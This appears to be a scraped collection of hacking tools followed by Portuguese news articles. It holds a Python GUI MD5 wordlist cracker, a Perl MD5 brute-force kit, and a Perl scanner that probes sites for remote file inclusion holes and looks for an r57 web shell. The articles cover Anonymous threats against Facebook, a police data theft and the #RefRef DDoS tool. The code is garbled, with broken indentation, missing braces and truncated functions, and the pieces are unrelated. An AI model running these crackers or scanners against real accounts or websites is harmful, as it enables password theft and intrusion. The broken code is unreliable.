#MD5 Cracker (GUI Version)

from Tkinter import *
import tkFileDialog, md5

class Application(Frame):
    def __init__(self, master):
        Frame.__init__(self, master)
    def create_widget(self):
        self.lbl = Label(self, text = "ENTER MD5: ")
        self.lbl.grid(row = 2, column = 0, sticky = E)
        self.pw_ent = Entry(self, width = 32)
        self.pw_ent.grid(row = 2, column = 1, sticky = E)
        self.submit_bttn = Button(self, text = "Choose Wordlist", command = self.loadwords)
        self.submit_bttn.grid(row = 5, column = 1, sticky = W)
        self.txtbox = Text(self, width = 55, height = 8, font=('Georgia', 8), bg = "#CCC", wrap = WORD)
        self.txtbox.grid(row = 7, column = 0, columnspan = 2, sticky = W)

        self.bttn1 = Button(self, text = "Crack", font=('courier', 10, 'bold'), command = self.crack)
        self.bttn1.grid(row = 9, columnspan = 2, sticky = "WE")
        self.clear = Button(self, text="Clear", font=('Georgia', 8), command = self.clear)
        self.clear.grid(row = 10, column = 1,sticky= E)
    def loadwords(self):
        global wordlist
        file = tkFileDialog.askopenfile(parent=root,mode='r',title='Choose a file')
        wordlist = file.readlines()
        self.txtbox.insert(END, "Loaded: "+str(len(wordlist))+" words")
    def crack(self):
        pw = self.pw_ent.get()
        if len(pw) == 32:
            self.txtbox.insert(END, "\nCracking: "+pw)
            for word in wordlist:
                hash = md5.new(word.replace("\n","")).hexdigest()
                if pw == hash:
                    self.txtbox.insert(END, "\n\nCracked: "+word)
            self.txtbox.insert(END, "\nComplete")
            self.txtbox.insert(END, "\nImproper MD5 Length: "+str(len(pw)))
    def clear(self):
        self.pw_ent.delete(0, END)
           self.txtbox.delete(0.0, END)
        wordlist = []
root = Tk()
root.title("MD5 Cracker")
app = Application(root)

# use strict; Sorry next time i'll use it ;)
# MD5 Hash Bruteforce Kit
# by Iman Karim (iman.karim@smail.inf.fh-bonn-rhein-sieg.de)
# URL : http://home.inf.fh-rhein-sieg.de/~ikarim2s/
# Date : 11.02.2007
# Info[0] : This Cracker is by far not the fastest! But it helped me alot to find "lost" passwords ;)
# Info[1] : Written under Kubuntu Linux (Throw away Windows!)
# Info[2] : If you can code a bit perl, you can modify it to crack sha etc too...
# Greets to: Invisible!

$ver = "01";

$dbgtmr = "1"; #Intervall of showing the current speed + lastpassword in seconds.

if ($dbgtmr<=0){ die "Set dbgtmr to a value >=1 !\n";};
use Digest::MD5 qw(md5_hex);
use Time::HiRes qw(gettimeofday);

if ($ARGV[0]=~"a") {
$alpha = "abcdefghijklmnopqrstuvwxyz";}
if ($ARGV[0]=~"A") {
if ($ARGV[0]=~"d") {
$alpha = $alpha."1234567890";}

if ($ARGV[0]=~"x") {

$alpha = $alpha. "!\"\$%&/()=?-.:\\*'-_:.;,";}

if ($alpha eq "" or $ARGV[3] eq "") {usage();};
if (length($ARGV[3]) != 32) { die "Sorry but it seems that the MD5 is not valid!\n";};

print "Selected charset for attack: '$alpha\'\n";
print "Going to Crack '$ARGV[3]'...\n";

for (my $t=$ARGV[1];$t<=$ARGV[2];$t++){
crack ($t);

sub usage{
print "\n\nMD5 Hash Bruteforce Kit v_$ver\n";
print "by Iman Karim (iman.karim\@smail.inf.fh-bonn-rhein-sieg.de)\n";
print "http:\/\/home.inf.fh-rhein-sieg.de\/~ikarim2s\/\n\n";
print "USAGE\n";

print "./md5crack \n";
print " Charset can be: [aAdx]\n";
print " a = {'a','b','c',...}\n";
print " A = {'A','B','C',...}\n";
print " d = {'1','2','3',...}\n";
print " x = {'!','\"',' ',...}\n";
print "./md5crack.pl ad 1 3 900150983cd24fb0d6963f7d28e17f72\n";
print " This example tries to crack the given MD5 with all lowercase Alphas and all digits.\n";
print " MD5 Kit only tries combinations with a length from 1 and 3 characters.\n-------\n";
print "./md5crack.pl aA 3 3 900150983cd24fb0d6963f7d28e17f72\n";
print " This example tries to crack the given MD5 with all lowercase Alphas and all uppercase Alphas.\n";
print " MD5 Kit only tries passwords which length is exactly 3 characters.\n-------\n";
print "./md5crack.pl aAdx 1 10 900150983cd24fb0d6963f7d28e17f72\n";
print " This example tries to crack the given MD5 with nearly every character.\n";
print " MD5 Kit only tries combinations with a length from 1 to 10 characters.\n";
die "Quitting...\n";


sub crack{
$CharSet = shift;
@RawString = ();
for (my $i =0;$i<$CharSet;$i++){ $RawString[i] = 0;}

$Start = gettimeofday();
  for (my $i =0;$i<$CharSet;$i++){
   if ($RawString[$i] > length($alpha)-1){
    if ($i==$CharSet-1){
    print "Bruteforcing done with $CharSet Chars. No Results.\n";
    return false;


   $ret = "";
   for (my $i =0;$i<$CharSet;$i++){ $ret = $ret . substr($alpha,$RawString[$i],1);}
   $hash = md5_hex($ret);
   $Stop = gettimeofday();
   if ($Stop-$Start>$dbgtmr){
    $cnt = int($cnt/$dbgtmr);
    print "$cnt hashes\\second.\tLast Pass '$ret\'\n";
    $Start = gettimeofday();
            print "$ARGV[3] != $hash ($ret)\n";
   if ($ARGV[3] eq $hash){
    die "\n**** Password Cracked! => $ret\n";




sub checkhash{
$CharSet = shift;
$ret = "";
for (my $i =0;$i<$CharSet;$i++){ $ret = $ret . substr($alpha,$RawString[$i],1);}
$hash = md5_hex($ret);
$Stop = gettimeofday();
if ($Stop-$Start>$dbgtmr){
  $cnt = int($cnt/$dbgtmr);
  print "$cnt hashes\\second.\tLast Pass '$ret\'\n";
  $Start = gettimeofday();

if ($ARGV[3] eq $hash){
  die "\n**** Password Cracked! => $ret\n";


#Scan a host for rfi vulnerability
# by priv8, senk0 version
use HTTP::Request;
use LWP::UserAgent;

sub inizio{
print q(
   Rfi vulnerability scanner
   by nobody, senk0 version
print "\n Insert host:(ex: http://www.site.com/)\n";
print "Ok lets scan..\n";
$rfi276="pmwiki wiki/pmwiki-2.1.beta20/pmwiki.php?GLOBALS[FarmD]=";
$rfi326="skin/zero_vote/error.php? dir=";

$int = $values[ rand(4) ];
#Seu Script de Teste.
my $req=HTTP::Request->new(GET=>$url2);
my $ua=LWP::UserAgent->new();
my $response=$ua->request($req);

if ($response->is_success) {
if( $response->content =~ /r57shell/ && $response->content =~ /by/ ){
print FILE "$url2\n";
print "$url2 is vulnerable..\n";

Anonymous promete "matar" Facebook

Anonymous promete

Anonymous promete

Os Anonymous estão a preparar um ataque ao Facebook, considerando alguns vídeos publicados no YouTube, onde supostamente o grupo de hackers anuncia que irá liderar uma “ciberinvestida” mortal contra a rede social criada por Mark Zuckerberg, com data marcada para 5 de Novembro.

Na origem da decisão de avançar com a “Operação Facebook”, que promete ser mais radical do que os ataques anteriores, onde a finalidade era reivindicar ou simplesmente “molestar”, estão as constantes violações à privacidade dos utilizadores, justificam.

Nos vídeos que circulam no YouTube acusa-se a rede social de vender informação a agências governamentais e de oferecer clandestinamente dados dos utilizadores a empresas de segurança, “o que permite espiar pessoas de todo o mundo”.

Também se avisa que “tudo o que se passa no Facebook fica no Facebook”, sendo impossível impedir a recuperação da informação por parte da empresa sempre que esta o deseje, mesmo com a conta encerrada. “O Facebook sabe mais sobre ti do que a tua própria família”, remata-se.

No YouTube pode ser encontrado mais do que um vídeo sobre o assunto. O mais antigo data de há três semanas atrás, e os mais recentes de há apenas dias. O slogan “Somos Anonymous. Somos legião. Não perdoamos. Não esquecemos. Aguardem-nos”, serve de assinatura.

Num outro registo, e desta vez “confirmado oficialmente”, os Anonymous informaram em comunicado ter acedido à rede informática de cerca de 70 sistemas policiais norte-americanos.

O grupo terá conseguido recolher dez gigas de dados que incluem emails, números de cartões de crédito e outras informações pessoais de agentes policiais locais, avança a AP.

“Vamos publicar uma quantidade maciça de informação confidencial que seguramente humilhará, desacreditará e incriminará agentes de polícia um pouco por todo o lado nos EUA”, diz o comunicado. “Queremos expor a cultura corrupta inerente às forças policiais”, acrescenta-se.

Novas ferramentas de hacking por Anonymous (um canhão Novo)

Novas ferramentas de hacking por Anonymous (um canhão Novo)

Anônima está desenvolvendo uma ferramenta nova DDoS. Até agora, o que eles têm é algo que é plataforma neutra, alavancando JavaScript e vulnerabilidades dentro de SQL para criar um impacto devastador sobre o site alvo. Mas será a última ferramenta, e vai fazer trabalho de aplicação da lei é mais difícil no longo prazo?
Anteriormente, Low Orbit Ion Canon (LOIC) foi a arma para ir para torcedores anônimos durante os protestos contra os ditadores na África do Norte, e Operation: Payback. No entanto, LOIC é também a razão dezenas de pessoas foram presas no último ano, assim que muitos sentem o seu tempo está no fim.
A nova ferramenta, chamada # RefRef, está previsto para ser lançado em setembro, de acordo com um Anon promovê-la no IRC, esta tarde. Desenvolvido com JavaScript, a ferramenta é dito para usar o poder do site de destino de processamento própria contra si mesma.

No final, o servidor sucumbe à exaustão de recursos devido ao uso de # RefRef. Um vetor de ataque que já existe há algum tempo, o esgotamento de recursos é muitas vezes ignorado por invasores que mais favorecem a força bruta de um ataque DDoS provenientes de bots ou ferramentas como LOIC.